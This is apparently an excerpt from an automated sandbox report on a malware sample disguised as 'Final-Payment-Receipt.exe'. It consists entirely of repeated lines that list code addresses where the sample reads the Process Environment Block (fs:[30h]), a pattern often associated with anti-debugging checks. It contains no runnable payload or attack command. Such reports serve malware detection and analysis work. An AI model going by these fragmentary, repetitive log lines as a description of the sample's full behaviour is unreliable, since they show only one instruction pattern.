          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013BAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0147AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0147AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F5A69 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F5A69 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F5A69 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01471229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013CAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013CAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013ED294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013ED294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01433540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01463D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013BAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EF527 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EF527 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EF527 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D8D76 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D8D76 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D8D76 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D8D76 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D8D76 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0143A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01488D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0147E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01436DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01436DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01436DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01436DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01436DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01436DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0147FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0147FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0147FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0147FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01468DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01472D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01472D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01472D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01472D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01472D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01472D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01472D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013CD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013CD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014805AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014805AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E3C3E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E3C3E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E3C3E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0144C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0144C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0148740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0148740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0148740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01436C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01436C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01436C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01436C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01488CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01436CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01436CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01436CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014714FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E3F33 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01471751 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01488F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E4710 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0148070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0148070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0144FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0144FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013CFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013CEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014717D2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01437794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01437794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01437794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0147AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0147AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013BE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013BC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013BC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013BC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D5600 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D5600 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D5600 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D5600 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D5600 mov eax, dword ptr fs:[00000030h]
